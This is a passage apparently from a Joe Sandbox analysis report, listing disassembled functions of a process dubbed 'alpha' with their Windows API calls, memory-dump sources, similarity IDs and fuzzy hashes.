                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBB49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EBB4BD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06D6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06F0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC074D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC0762
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EBB518
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EBB58B
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ELSE$IF/?
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3223794493-1134991328
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e9c6d2df76423b86a132f8d1c96a54bc21f8d152575276308545f0da19725c9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90414921E09B43C2FB55BB24AC352BBA6A1BF54740FD46139D61E472A6DF3CE8018371
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDE3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1532185241-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1c6a72294256c0d412322bc2bdf676a70003fefc2a48fff7776376e553141a5d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0341D432A147528BE754AB21DC6567FFAA1FF88B80F895535EB0A47785CF3CE8418710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB4FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3588551418-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f2ad0e1288994c78b38136c1c72dc95c389cf76207dbd40098ee7b0582e7d934
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B417B32A087428BE724AF11AC6027FF661FF94B84F985539DB0A47795DF2CE8408760
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDE558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2123716050-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 34ee96bfd6a58e7886c4d778852199332be4e034c254dc2a1bf8aee503449b08
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14418C32705BC28AEB319F25DC643EAA794FF49B88F844134DB4D4AA98EF3CD2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB65F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3114114779-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 96c6c586a5ab1f5334fe5979924d9833b6c4458fe2cb3fb504c803d00f10e65d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5417C36A05B42CAEB00EF65DC502AE77A5FB98748F954135DE0D93B98DF38D416C360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDA73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA77A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA7AF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA80E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA839
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA850
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2240656346-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ebdbc91e8d620a6daac55ff06a498b509cc749ebc3b674aa33d812a43480617d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D318036A18B8186E750AF19EC6447BF6A5FF88790F985134EB4E43794DF3CD9418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDD0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: _get_osfhandle.MSVCRT ref: 00007FF706EC01C4
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC01D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EDD0F9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF706EDD10F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF706EDD166
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EDD17A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF706EDD18C
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3008996577-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b24dd98aebcb12925472f0963a1c8091bd4b0abe9c7a22edcb2826430f548124
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49212926B14B518AE710ABB1EC200BEB7B0FF4DB58B845125EE1D53B98EF38D045CB24
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED5770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1078844751-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a523512e982a220c5e5f49bf3ffcf026087dac80177ebe14f5ff2bfeb0484b5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF51D765B2978286EE21AF549C746BBE290FF84B94FE84435DB0D0B785DF3DE4058720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDB89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF706EDB934
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF706EC5085), ref: 00007FF706EDB9A5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF706EC5085), ref: 00007FF706EDB9F7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %WINDOWS_COPYRIGHT%
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1103618819-1745581171
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c715e966d7cdce478912b38ae3c7ad385e6d614edae18ac0cae38b5969a064ae
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C41A5A690878186EB10AF159C2027AB7A0FF69B94FCA5235DF4D07395EF3CE441C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE0774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
